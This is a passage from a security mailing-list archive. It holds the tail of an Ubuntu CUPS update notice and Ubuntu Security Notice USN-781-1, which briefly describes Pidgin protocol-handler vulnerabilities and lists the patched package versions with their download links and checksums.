536346a17e6b5035307bdf1ce04b3799 http://ports.ubuntu.com/pool/main/c/cupsys/cupsys-client_1.3.7-1ubuntu3.5_lpia.deb Size/MD5: 88744 2141679378e4e3700c78c09ec936e1da http://ports.ubuntu.com/pool/main/c/cupsys/cupsys_1.3.7-1ubuntu3.5_lpia.deb Size/MD5: 1865310 094ffb6f741440a18fca28d50b29ead0 http://ports.ubuntu.com/pool/main/c/cupsys/libcupsimage2-dev_1.3.7-1ubuntu3.5_lpia.deb Size/MD5: 60488 8681c7ebbe8e781fb7b3348b00da9de9 http://ports.ubuntu.com/pool/main/c/cupsys/libcupsimage2_1.3.7-1ubuntu3.5_lpia.deb Size/MD5: 50808 dce50fc21c292b77ff3d0f21946cf23e http://ports.ubuntu.com/pool/main/c/cupsys/libcupsys2-dev_1.3.7-1ubuntu3.5_lpia.deb Size/MD5: 337014 84ca26401f9ae81f3d9f535f0361dd0c http://ports.ubuntu.com/pool/main/c/cupsys/libcupsys2_1.3.7-1ubuntu3.5_lpia.deb Size/MD5: 173878 1f3e4888d7cf574b1c62aa092c852b8a powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/c/cupsys/cupsys-bsd_1.3.7-1ubuntu3.5_powerpc.deb Size/MD5: 46918 6e9a925312380561f2299f66cb134357 http://ports.ubuntu.com/pool/main/c/cupsys/cupsys-client_1.3.7-1ubuntu3.5_powerpc.deb Size/MD5: 110820 b7b8c667cf96cfe0d60c1f2d1ba96628 http://ports.ubuntu.com/pool/main/c/cupsys/cupsys_1.3.7-1ubuntu3.5_powerpc.deb Size/MD5: 1949102 2d78cac8f6b3c758ac337c791de433a3 http://ports.ubuntu.com/pool/main/c/cupsys/libcupsimage2-dev_1.3.7-1ubuntu3.5_powerpc.deb Size/MD5: 59926 0c7f18be806b6467c39dd1955c6e4685 http://ports.ubuntu.com/pool/main/c/cupsys/libcupsimage2_1.3.7-1ubuntu3.5_powerpc.deb Size/MD5: 54920 9403a69f365361e033707d5914a92f52 http://ports.ubuntu.com/pool/main/c/cupsys/libcupsys2-dev_1.3.7-1ubuntu3.5_powerpc.deb Size/MD5: 341668 0ee868915ef0bd3e177244f931ec7b5d http://ports.ubuntu.com/pool/main/c/cupsys/libcupsys2_1.3.7-1ubuntu3.5_powerpc.deb Size/MD5: 183836 e45a7d338ce136c48abf6c5cce3b6f6b sparc architecture (Sun SPARC/UltraSPARC): http://ports.ubuntu.com/pool/main/c/cupsys/cupsys-bsd_1.3.7-1ubuntu3.5_sparc.deb Size/MD5: 38028 e556e3eecc385e35b5c790046f91cec9 http://ports.ubuntu.com/pool/main/c/cupsys/cupsys-client_1.3.7-1ubuntu3.5_sparc.deb Size/MD5: 91034 84e2052f3fd9e57363b13779fe3fb30f http://ports.ubuntu.com/pool/main/c/cupsys/cupsys_1.3.7-1ubuntu3.5_sparc.deb Size/MD5: 1897852 30481f2e4dff5ba7e8d465d0771360c8 http://ports.ubuntu.com/pool/main/c/cupsys/libcupsimage2-dev_1.3.7-1ubuntu3.5_sparc.deb Size/MD5: 57826 72589c6d350921d2ac7d5a4207c5b78a http://ports.ubuntu.com/pool/main/c/cupsys/libcupsimage2_1.3.7-1ubuntu3.5_sparc.deb Size/MD5: 48216 59e887dda48b748158c7083d50fb6405 http://ports.ubuntu.com/pool/main/c/cupsys/libcupsys2-dev_1.3.7-1ubuntu3.5_sparc.deb Size/MD5: 341372 0976433618733b76b21104715594256e http://ports.ubuntu.com/pool/main/c/cupsys/libcupsys2_1.3.7-1ubuntu3.5_sparc.deb Size/MD5: 173768 853ddf9a445d28cdf2740957676b50cd Updated packages for Ubuntu 8.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/c/cups/cups_1.3.9-2ubuntu9.2.diff.gz Size/MD5: 329287 0f1eabafd9f35ce1c7103f131976af91 http://security.ubuntu.com/ubuntu/pool/main/c/cups/cups_1.3.9-2ubuntu9.2.dsc Size/MD5: 2043 5c406df0ddf6c7f849147bbccb4350bb http://security.ubuntu.com/ubuntu/pool/main/c/cups/cups_1.3.9.orig.tar.gz Size/MD5: 4809771 e6f2d90491ed050e5ff2104b617b88ea Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/c/cups/cups-common_1.3.9-2ubuntu9.2_all.deb Size/MD5: 1162826 78ce799e56015d07969aea1b1e5750fe http://security.ubuntu.com/ubuntu/pool/main/c/cups/cupsys-bsd_1.3.9-2ubuntu9.2_all.deb Size/MD5: 58238 c04c758e79b5d28dec48637c8c73b549 http://security.ubuntu.com/ubuntu/pool/main/c/cups/cupsys-client_1.3.9-2ubuntu9.2_all.deb Size/MD5: 58252 588dfe9e578fb1a17daf2faa5fab8774 http://security.ubuntu.com/ubuntu/pool/main/c/cups/cupsys-dbg_1.3.9-2ubuntu9.2_all.deb Size/MD5: 58244 0fa4c07b2e66a7d0c106071d283d7edc http://security.ubuntu.com/ubuntu/pool/main/c/cups/cupsys_1.3.9-2ubuntu9.2_all.deb Size/MD5: 58236 f163f465b79566c194364d14ebb49608 http://security.ubuntu.com/ubuntu/pool/main/c/cups/libcupsys2-dev_1.3.9-2ubuntu9.2_all.deb Size/MD5: 58252 afd476b79ec34e694d19f360a2cbc64c http://security.ubuntu.com/ubuntu/pool/universe/c/cups/cupsys-common_1.3.9-2ubuntu9.2_all.deb Size/MD5: 4526 bd17a9f9600e53f3c5ce3b18a2cae590 http://security.ubuntu.com/ubuntu/pool/universe/c/cups/libcupsys2_1.3.9-2ubuntu9.2_all.deb Size/MD5: 58240 b1702f69d74e496859096eb6101e5139 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/c/cups/cups-bsd_1.3.9-2ubuntu9.2_amd64.deb Size/MD5: 37300 2e18f255477200b6320afa7e6903508f http://security.ubuntu.com/ubuntu/pool/main/c/cups/cups-client_1.3.9-2ubuntu9.2_amd64.deb Size/MD5: 119744 9c484968a2250bd303c305df9d53943f http://security.ubuntu.com/ubuntu/pool/main/c/cups/cups-dbg_1.3.9-2ubuntu9.2_amd64.deb Size/MD5: 1682962 e7fa53ce69537cd609e8d88e1873e9cc http://security.ubuntu.com/ubuntu/pool/main/c/cups/cups_1.3.9-2ubuntu9.2_amd64.deb Size/MD5: 2172504 b4d5b2ce9603e2b36374b100dbf9ada7 http://security.ubuntu.com/ubuntu/pool/main/c/cups/libcups2-dev_1.3.9-2ubuntu9.2_amd64.deb Size/MD5: 352190 8bbf84d00818cf88c0f3d048fa425cf1 http://security.ubuntu.com/ubuntu/pool/main/c/cups/libcups2_1.3.9-2ubuntu9.2_amd64.deb Size/MD5: 173268 01abbe7f859eef7e9e5d453792b96f76 http://security.ubuntu.com/ubuntu/pool/main/c/cups/libcupsimage2-dev_1.3.9-2ubuntu9.2_amd64.deb Size/MD5: 61314 73a75d935ccb41f7827bfeff0bf8f9ec http://security.ubuntu.com/ubuntu/pool/main/c/cups/libcupsimage2_1.3.9-2ubuntu9.2_amd64.deb Size/MD5: 52312 263e4265a47473eff3b416b896907103 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/c/cups/cups-bsd_1.3.9-2ubuntu9.2_i386.deb Size/MD5: 36226 c8d3d0df62f93d519369f37ab0d337bf http://security.ubuntu.com/ubuntu/pool/main/c/cups/cups-client_1.3.9-2ubuntu9.2_i386.deb Size/MD5: 115328 65483c26c3e0efe02922a59beeb0d833 http://security.ubuntu.com/ubuntu/pool/main/c/cups/cups-dbg_1.3.9-2ubuntu9.2_i386.deb Size/MD5: 1542716 c3737d9cfb6277985baf83bf4a449150 http://security.ubuntu.com/ubuntu/pool/main/c/cups/cups_1.3.9-2ubuntu9.2_i386.deb Size/MD5: 2139250 edef8688cd2fe57ac989b4bad50022ac http://security.ubuntu.com/ubuntu/pool/main/c/cups/libcups2-dev_1.3.9-2ubuntu9.2_i386.deb Size/MD5: 345992 e4adcaea69f8ae947f1ca0b63af74ffd http://security.ubuntu.com/ubuntu/pool/main/c/cups/libcups2_1.3.9-2ubuntu9.2_i386.deb Size/MD5: 170194 fd8ab14aafda63f2f41cbd4885be0d81 http://security.ubuntu.com/ubuntu/pool/main/c/cups/libcupsimage2-dev_1.3.9-2ubuntu9.2_i386.deb Size/MD5: 60534 5064205f7a26e8ed1a543932e6aad79e http://security.ubuntu.com/ubuntu/pool/main/c/cups/libcupsimage2_1.3.9-2ubuntu9.2_i386.deb Size/MD5: 51718 e663a435f42d39438e5fdf1ed599c7cb lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/c/cups/cups-bsd_1.3.9-2ubuntu9.2_lpia.deb Size/MD5: 36014 b9a880feca8d481df4f9495cec8b8121 http://ports.ubuntu.com/pool/main/c/cups/cups-client_1.3.9-2ubuntu9.2_lpia.deb Size/MD5: 114512 1617fc04bc3c063dcb8bbc884050c6b2 http://ports.ubuntu.com/pool/main/c/cups/cups-dbg_1.3.9-2ubuntu9.2_lpia.deb Size/MD5: 1571962 7b061e95651696885125af95d7b08532 http://ports.ubuntu.com/pool/main/c/cups/cups_1.3.9-2ubuntu9.2_lpia.deb Size/MD5: 2135962 8695e326f9876ed3c3012becfaeed0f4 http://ports.ubuntu.com/pool/main/c/cups/libcups2-dev_1.3.9-2ubuntu9.2_lpia.deb Size/MD5: 342968 9887c91b3ac9427b240317f6eb6d8bf0 http://ports.ubuntu.com/pool/main/c/cups/libcups2_1.3.9-2ubuntu9.2_lpia.deb Size/MD5: 168430 e13502a0fda3165d41d92f156f2ade21 http://ports.ubuntu.com/pool/main/c/cups/libcupsimage2-dev_1.3.9-2ubuntu9.2_lpia.deb Size/MD5: 60630 63b43b5b90c7f271d8ffc491d50c77e0 http://ports.ubuntu.com/pool/main/c/cups/libcupsimage2_1.3.9-2ubuntu9.2_lpia.deb Size/MD5: 52386 f0ee10297823f8aa39049a1f9cff34bb powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/c/cups/cups-bsd_1.3.9-2ubuntu9.2_powerpc.deb Size/MD5: 43564 e3d68dd451cae339f4629e36363e27b4 http://ports.ubuntu.com/pool/main/c/cups/cups-client_1.3.9-2ubuntu9.2_powerpc.deb Size/MD5: 138160 8d11bd04570c0738af0b35ecef8ca018 http://ports.ubuntu.com/pool/main/c/cups/cups-dbg_1.3.9-2ubuntu9.2_powerpc.deb Size/MD5: 1663540 3f5d9437ffe6df630cde4ad4b4fbbe35 http://ports.ubuntu.com/pool/main/c/cups/cups_1.3.9-2ubuntu9.2_powerpc.deb Size/MD5: 2264222 6c49653a70198b67692c220135fe5428 http://ports.ubuntu.com/pool/main/c/cups/libcups2-dev_1.3.9-2ubuntu9.2_powerpc.deb Size/MD5: 347966 72a14e0a64f503365475c436fa45ac39 http://ports.ubuntu.com/pool/main/c/cups/libcups2_1.3.9-2ubuntu9.2_powerpc.deb Size/MD5: 177464 2615af3dce1a5b56c001adcbab649264 http://ports.ubuntu.com/pool/main/c/cups/libcupsimage2-dev_1.3.9-2ubuntu9.2_powerpc.deb Size/MD5: 61256 b021d0be4915346dfc22203556c56ce4 http://ports.ubuntu.com/pool/main/c/cups/libcupsimage2_1.3.9-2ubuntu9.2_powerpc.deb Size/MD5: 57436 a9463cb0014dba068fe6ad3dd05b7693 sparc architecture (Sun SPARC/UltraSPARC): http://ports.ubuntu.com/pool/main/c/cups/cups-bsd_1.3.9-2ubuntu9.2_sparc.deb Size/MD5: 37216 b30aec0d4f3cff1d59594c1272002e93 http://ports.ubuntu.com/pool/main/c/cups/cups-client_1.3.9-2ubuntu9.2_sparc.deb Size/MD5: 117640 35ca75a0021841529ed85691ba0496bc http://ports.ubuntu.com/pool/main/c/cups/cups-dbg_1.3.9-2ubuntu9.2_sparc.deb Size/MD5: 1490704 f143b16a5a811b517cc968d9e628feb9 http://ports.ubuntu.com/pool/main/c/cups/cups_1.3.9-2ubuntu9.2_sparc.deb Size/MD5: 2200938 91b1621927bd5feb83bd1dd8fa20005d http://ports.ubuntu.com/pool/main/c/cups/libcups2-dev_1.3.9-2ubuntu9.2_sparc.deb Size/MD5: 344786 c5e02a1f344ddc4e10b91b255ac869dd http://ports.ubuntu.com/pool/main/c/cups/libcups2_1.3.9-2ubuntu9.2_sparc.deb Size/MD5: 166318 e6bfc6840275b954311c4544667d6193 http://ports.ubuntu.com/pool/main/c/cups/libcupsimage2-dev_1.3.9-2ubuntu9.2_sparc.deb Size/MD5: 57848 f4c6f5c70fd1ec7a95c322186e86c487 http://ports.ubuntu.com/pool/main/c/cups/libcupsimage2_1.3.9-2ubuntu9.2_sparc.deb Size/MD5: 49796 52f0c961942e4a0b8e85ed3b6d4953a4 Updated packages for Ubuntu 9.04: Source archives: http://security.ubuntu.com/ubuntu/pool/main/c/cups/cups_1.3.9-17ubuntu3.1.diff.gz Size/MD5: 331113 386644ef646604fa3ea0f18a3440dd94 http://security.ubuntu.com/ubuntu/pool/main/c/cups/cups_1.3.9-17ubuntu3.1.dsc Size/MD5: 1984 974758acb855004824caa579913a402f http://security.ubuntu.com/ubuntu/pool/main/c/cups/cups_1.3.9.orig.tar.gz Size/MD5: 4809771 e6f2d90491ed050e5ff2104b617b88ea Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/c/cups/cups-common_1.3.9-17ubuntu3.1_all.deb Size/MD5: 1165116 0fea2201baecec1a63153ca024cf85b3 http://security.ubuntu.com/ubuntu/pool/main/c/cups/cupsys-dbg_1.3.9-17ubuntu3.1_all.deb Size/MD5: 60220 78f1df511789d7c6fa564df73ae3737e http://security.ubuntu.com/ubuntu/pool/main/c/cups/libcupsys2-dev_1.3.9-17ubuntu3.1_all.deb Size/MD5: 60230 dd363c3548b1d7bab16bb595ac2d8682 http://security.ubuntu.com/ubuntu/pool/universe/c/cups/cupsys-bsd_1.3.9-17ubuntu3.1_all.deb Size/MD5: 60222 3fe72599089459e0533070ee35696c96 http://security.ubuntu.com/ubuntu/pool/universe/c/cups/cupsys-client_1.3.9-17ubuntu3.1_all.deb Size/MD5: 60218 33922120f0f3b6d755691c6cd31a983a http://security.ubuntu.com/ubuntu/pool/universe/c/cups/cupsys-common_1.3.9-17ubuntu3.1_all.deb Size/MD5: 4520 4944980239da17a124a13b5eb08814af http://security.ubuntu.com/ubuntu/pool/universe/c/cups/cupsys_1.3.9-17ubuntu3.1_all.deb Size/MD5: 60204 578a4a096679845a551abab4687ecd07 http://security.ubuntu.com/ubuntu/pool/universe/c/cups/libcupsys2_1.3.9-17ubuntu3.1_all.deb Size/MD5: 60220 404eae856385b1def832fb0474551e51 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/c/cups/cups-bsd_1.3.9-17ubuntu3.1_amd64.deb Size/MD5: 37310 824835ae3f5e791b0ced4e0bfa0094aa http://security.ubuntu.com/ubuntu/pool/main/c/cups/cups-client_1.3.9-17ubuntu3.1_amd64.deb Size/MD5: 119750 d3562b6435de311fdfdd3f5a433beafe http://security.ubuntu.com/ubuntu/pool/main/c/cups/cups-dbg_1.3.9-17ubuntu3.1_amd64.deb Size/MD5: 1658120 811f80a88d0fdcee20f41383b313d073 http://security.ubuntu.com/ubuntu/pool/main/c/cups/cups_1.3.9-17ubuntu3.1_amd64.deb Size/MD5: 2168616 178ada0830fa6b64f1b2a28f43ba68d5 http://security.ubuntu.com/ubuntu/pool/main/c/cups/libcups2-dev_1.3.9-17ubuntu3.1_amd64.deb Size/MD5: 352130 b9502f3daaa52d057a815e6a11433707 http://security.ubuntu.com/ubuntu/pool/main/c/cups/libcups2_1.3.9-17ubuntu3.1_amd64.deb Size/MD5: 177068 fedd91d5e3094e813b85c910e6f950ab http://security.ubuntu.com/ubuntu/pool/main/c/cups/libcupsimage2-dev_1.3.9-17ubuntu3.1_amd64.deb Size/MD5: 61260 68d03afa62ffd74aa517c588cd32017d http://security.ubuntu.com/ubuntu/pool/main/c/cups/libcupsimage2_1.3.9-17ubuntu3.1_amd64.deb Size/MD5: 52220 715bc18c530db346e2faad81789af0a0 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/c/cups/cups-bsd_1.3.9-17ubuntu3.1_i386.deb Size/MD5: 36212 f8a3d3701b170c1637b469b1abcde7c6 http://security.ubuntu.com/ubuntu/pool/main/c/cups/cups-client_1.3.9-17ubuntu3.1_i386.deb Size/MD5: 115324 062953a515a6c8b27c75c7539472f9f4 http://security.ubuntu.com/ubuntu/pool/main/c/cups/cups-dbg_1.3.9-17ubuntu3.1_i386.deb Size/MD5: 1517622 a3c1f3ad98db97230d25ba20acfa4c11 http://security.ubuntu.com/ubuntu/pool/main/c/cups/cups_1.3.9-17ubuntu3.1_i386.deb Size/MD5: 2134800 0cde4fc0fac7b7682f0a53f38caedbc4 http://security.ubuntu.com/ubuntu/pool/main/c/cups/libcups2-dev_1.3.9-17ubuntu3.1_i386.deb Size/MD5: 345990 2bc3076c1ad6c67c5858f62714ab4a3b http://security.ubuntu.com/ubuntu/pool/main/c/cups/libcups2_1.3.9-17ubuntu3.1_i386.deb Size/MD5: 173740 c44041d8784eae4ac9400a0d3b9b9138 http://security.ubuntu.com/ubuntu/pool/main/c/cups/libcupsimage2-dev_1.3.9-17ubuntu3.1_i386.deb Size/MD5: 60488 c923e354bf04dbafff5339ea6d18433e http://security.ubuntu.com/ubuntu/pool/main/c/cups/libcupsimage2_1.3.9-17ubuntu3.1_i386.deb Size/MD5: 51530 b03604b87ea464a7f97e26272582ee18 lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/c/cups/cups-bsd_1.3.9-17ubuntu3.1_lpia.deb Size/MD5: 36032 2be317cc9206baaff256b4325072589a http://ports.ubuntu.com/pool/main/c/cups/cups-client_1.3.9-17ubuntu3.1_lpia.deb Size/MD5: 114486 8c27d1961b1aa8a73f3c342ae6ae92f8 http://ports.ubuntu.com/pool/main/c/cups/cups-dbg_1.3.9-17ubuntu3.1_lpia.deb Size/MD5: 1546154 0d3adaac793d357587ce7cc4275fe55f http://ports.ubuntu.com/pool/main/c/cups/cups_1.3.9-17ubuntu3.1_lpia.deb Size/MD5: 2132166 9ae39e3c42178dd9b384fc8bc8a13d82 http://ports.ubuntu.com/pool/main/c/cups/libcups2-dev_1.3.9-17ubuntu3.1_lpia.deb Size/MD5: 342936 2cff2dcc4b5cd9e54046bd97f2ca1bed http://ports.ubuntu.com/pool/main/c/cups/libcups2_1.3.9-17ubuntu3.1_lpia.deb Size/MD5: 171954 a2ea14f0324efa3d936f8a31730d0c9d http://ports.ubuntu.com/pool/main/c/cups/libcupsimage2-dev_1.3.9-17ubuntu3.1_lpia.deb Size/MD5: 60678 4594a7764c86b427ff76b2700a294ddc http://ports.ubuntu.com/pool/main/c/cups/libcupsimage2_1.3.9-17ubuntu3.1_lpia.deb Size/MD5: 52340 86b3bb0d4279f78231d1bdd0e1dbc3fb powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/c/cups/cups-bsd_1.3.9-17ubuntu3.1_powerpc.deb Size/MD5: 43578 302e5e3849b99d0a12e2ff4f96be71d1 http://ports.ubuntu.com/pool/main/c/cups/cups-client_1.3.9-17ubuntu3.1_powerpc.deb Size/MD5: 138164 5e62e249891ed196a7eb21466205fd7b http://ports.ubuntu.com/pool/main/c/cups/cups-dbg_1.3.9-17ubuntu3.1_powerpc.deb Size/MD5: 1633586 15e374d5ff627a56713f2a7ce61ef616 http://ports.ubuntu.com/pool/main/c/cups/cups_1.3.9-17ubuntu3.1_powerpc.deb Size/MD5: 2256002 66dd6a9c74b750671c86e90163941953 http://ports.ubuntu.com/pool/main/c/cups/libcups2-dev_1.3.9-17ubuntu3.1_powerpc.deb Size/MD5: 347906 cb12b0143262bdbe01a6e69584947228 http://ports.ubuntu.com/pool/main/c/cups/libcups2_1.3.9-17ubuntu3.1_powerpc.deb Size/MD5: 182450 c07ea0fed64ca677713c8a9362a38467 http://ports.ubuntu.com/pool/main/c/cups/libcupsimage2-dev_1.3.9-17ubuntu3.1_powerpc.deb Size/MD5: 61302 934f995a352040b03daf4b4462da2892 http://ports.ubuntu.com/pool/main/c/cups/libcupsimage2_1.3.9-17ubuntu3.1_powerpc.deb Size/MD5: 57414 31f122cc6a44e90c362dda241b98648c sparc architecture (Sun SPARC/UltraSPARC): http://ports.ubuntu.com/pool/main/c/cups/cups-bsd_1.3.9-17ubuntu3.1_sparc.deb Size/MD5: 37204 d11aa276b3c4049110c587b2131d1207 http://ports.ubuntu.com/pool/main/c/cups/cups-client_1.3.9-17ubuntu3.1_sparc.deb Size/MD5: 117558 c29f382879fce337b440b71cb3a88b3d http://ports.ubuntu.com/pool/main/c/cups/cups-dbg_1.3.9-17ubuntu3.1_sparc.deb Size/MD5: 1462180 9c40f63f4c088299eec0d97317c53a3a http://ports.ubuntu.com/pool/main/c/cups/cups_1.3.9-17ubuntu3.1_sparc.deb Size/MD5: 2201794 00f9c319e7fd6b9eeed508baba656d21 http://ports.ubuntu.com/pool/main/c/cups/libcups2-dev_1.3.9-17ubuntu3.1_sparc.deb Size/MD5: 344712 9f8df2c64cff337847abca91c4e3fb1f http://ports.ubuntu.com/pool/main/c/cups/libcups2_1.3.9-17ubuntu3.1_sparc.deb Size/MD5: 169558 555c2de1cc4ff90754500bb42947453e http://ports.ubuntu.com/pool/main/c/cups/libcupsimage2-dev_1.3.9-17ubuntu3.1_sparc.deb Size/MD5: 57850 d5d1dc89040b20f04c6a99d14524a6d1 http://ports.ubuntu.com/pool/main/c/cups/libcupsimage2_1.3.9-17ubuntu3.1_sparc.deb Size/MD5: 49686 46af0e0b82ed5cc1d562909eacd9a35c -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 197 bytes Desc: This is a digitally signed message part Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090603/9f6e113b/attachment.bin From marc.deslauriers at canonical.com Wed Jun 3 15:20:19 2009 From: marc.deslauriers at canonical.com (Marc Deslauriers) Date: Wed, 03 Jun 2009 10:20:19 -0400 Subject: [Full-disclosure] [USN-781-1] Pidgin vulnerabilities Message-ID: <1244038819.12402.1.camel@mdlinux.technorage.com> =========================================================== Ubuntu Security Notice USN-781-1 June 03, 2009 pidgin vulnerabilities CVE-2009-1373, CVE-2009-1374, CVE-2009-1375, CVE-2009-1376 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 8.04 LTS Ubuntu 8.10 Ubuntu 9.04 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 8.04 LTS: pidgin 1:2.4.1-1ubuntu2.4 Ubuntu 8.10: pidgin 1:2.5.2-0ubuntu1.2 Ubuntu 9.04: pidgin 1:2.5.5-1ubuntu8.1 After a standard system upgrade you need to restart Pidgin to effect the necessary changes. Details follow: It was discovered that Pidgin did not properly handle certain malformed messages when sending a file using the XMPP protocol handler. If a user were tricked into sending a file, a remote attacker could send a specially crafted response and cause Pidgin to crash, or possibly execute arbitrary code with user privileges. (CVE-2009-1373) It was discovered that Pidgin did not properly handle certain malformed messages in the QQ protocol handler. A remote attacker could send a specially crafted message and cause Pidgin to crash. This issue only affected Ubuntu 8.10 and 9.04. (CVE-2009-1374) It was discovered that Pidgin did not properly handle certain malformed messages in the XMPP and Sametime protocol handlers. A remote attacker could send a specially crafted message and cause Pidgin to crash. (CVE-2009-1375) It was discovered that Pidgin did not properly handle certain malformed messages in the MSN protocol handler. A remote attacker could send a specially crafted message and possibly execute arbitrary code with user privileges. (CVE-2009-1376) Updated packages for Ubuntu 8.04 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/pidgin_2.4.1-1ubuntu2.4.diff.gz Size/MD5: 68347 9be15621e9a9801a31b8ae6e4b82e0db http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/pidgin_2.4.1-1ubuntu2.4.dsc Size/MD5: 1539 7975b51e7a1d4c996282f51a584e0124 http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/pidgin_2.4.1.orig.tar.gz Size/MD5: 13297380 25e3593d5e6bfc17911111475a057778 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/finch-dev_2.4.1-1ubuntu2.4_all.deb Size/MD5: 37846 9c9c3f7775b089058bf603e28bd89240 http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/libpurple-bin_2.4.1-1ubuntu2.4_all.deb Size/MD5: 92352 ed5c3b2560b070733f7385d6a337f155 http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/libpurple-dev_2.4.1-1ubuntu2.4_all.deb Size/MD5: 234514 e3dc4721dcf091410a41e3d9faf807a6 http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/pidgin-data_2.4.1-1ubuntu2.4_all.deb Size/MD5: 1328934 93a62c9f2fd928c3ff1fafca325f3b50 http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/pidgin-dev_2.4.1-1ubuntu2.4_all.deb Size/MD5: 72638 8ad1fef0587ccbf626eb44587ba20e16 http://security.ubuntu.com/ubuntu/pool/universe/p/pidgin/gaim_2.4.1-1ubuntu2.4_all.deb Size/MD5: 86574 82e3c5c4361510f90b6ae8ea1efd15f6 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/finch_2.4.1-1ubuntu2.4_amd64.deb Size/MD5: 226874 aa753567d7edd194332eb2bfa8fd60ff http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/libpurple0_2.4.1-1ubuntu2.4_amd64.deb Size/MD5: 1604862 dbcc4128429686bfa835d563e6570e26 http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/pidgin-dbg_2.4.1-1ubuntu2.4_amd64.deb Size/MD5: 4432628 0b9baad686d3e5e1235c7996d104273a http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/pidgin_2.4.1-1ubuntu2.4_amd64.deb Size/MD5: 572090 d0bad2b9275b71af32231f5248393d12 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/finch_2.4.1-1ubuntu2.4_i386.deb Size/MD5: 200862 da71501bc4468b027e3d00dd03f607aa http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/libpurple0_2.4.1-1ubuntu2.4_i386.deb Size/MD5: 1365220 3853002c7d926ae93163c4bb1cead9b2 http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/pidgin-dbg_2.4.1-1ubuntu2.4_i386.deb Size/MD5: 4242680 17ba46fc81a67a4e8daa78a0e24881ca http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/pidgin_2.4.1-1ubuntu2.4_i386.deb Size/MD5: 517126 a1728b5ffb4c858df3a3696880ac2866 lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/p/pidgin/finch_2.4.1-1ubuntu2.4_lpia.deb Size/MD5: 197196 52fba9ae4400e779d792c3fac02afbc5 http://ports.ubuntu.com/pool/main/p/pidgin/libpurple0_2.4.1-1ubuntu2.4_lpia.deb Size/MD5: 1415190 725ae9563bb29f71a33e21f51dbafe91 http://ports.ubuntu.com/pool/main/p/pidgin/pidgin-dbg_2.4.1-1ubuntu2.4_lpia.deb Size/MD5: 4372348 467c8f22104d8a7510f17720f92849c8 http://ports.ubuntu.com/pool/main/p/pidgin/pidgin_2.4.1-1ubuntu2.4_lpia.deb Size/MD5: 511654 bc9a49261f7fd4d42e7fcb15f9cf61d8 powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/p/pidgin/finch_2.4.1-1ubuntu2.4_powerpc.deb Size/MD5: 237204 df93dfb31597cb65766e9def9514fbb5 http://ports.ubuntu.com/pool/main/p/pidgin/libpurple0_2.4.1-1ubuntu2.4_powerpc.deb Size/MD5: 1633562 5923438d1915040c9550ce705aa24212 http://ports.ubuntu.com/pool/main/p/pidgin/pidgin-dbg_2.4.1-1ubuntu2.4_powerpc.deb Size/MD5: 4475570 d0a2ee70257e289b79529cfe87c375e0 http://ports.ubuntu.com/pool/main/p/pidgin/pidgin_2.4.1-1ubuntu2.4_powerpc.deb Size/MD5: 589648 9807242929f9afb819fc4fdd6285d811 sparc architecture (Sun SPARC/UltraSPARC): http://ports.ubuntu.com/pool/main/p/pidgin/finch_2.4.1-1ubuntu2.4_sparc.deb Size/MD5: 212830 3176346be35b75d951a6960c1ac62333 http://ports.ubuntu.com/pool/main/p/pidgin/libpurple0_2.4.1-1ubuntu2.4_sparc.deb Size/MD5: 1531840 06b53e84b93d41585eeb2f0ebe572bc7 http://ports.ubuntu.com/pool/main/p/pidgin/pidgin-dbg_2.4.1-1ubuntu2.4_sparc.deb Size/MD5: 4363738 0d1d086c4b15c87d0165bfb02ec80e29 http://ports.ubuntu.com/pool/main/p/pidgin/pidgin_2.4.1-1ubuntu2.4_sparc.deb Size/MD5: 545626 ae8b3edc96a5a578271671652b7f0afd Updated packages for Ubuntu 8.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/pidgin_2.5.2-0ubuntu1.2.diff.gz Size/MD5: 60192 538fa71576474dc52288fcbb6b40581a http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/pidgin_2.5.2-0ubuntu1.2.dsc Size/MD5: 1995 554c6183486df7af4c9d3929e5f54263 http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/pidgin_2.5.2.orig.tar.gz Size/MD5: 11642659 3ad83133a2381087cbdddf42ba5d6ecf Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/finch-dev_2.5.2-0ubuntu1.2_all.deb Size/MD5: 38224 65b54c109e1d8ae04104da36e5806c18 